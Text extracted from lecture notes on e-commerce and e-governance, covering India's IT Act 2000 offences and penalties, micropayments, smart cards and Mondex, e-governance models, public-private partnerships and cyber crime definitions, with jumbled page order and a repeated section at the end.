Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
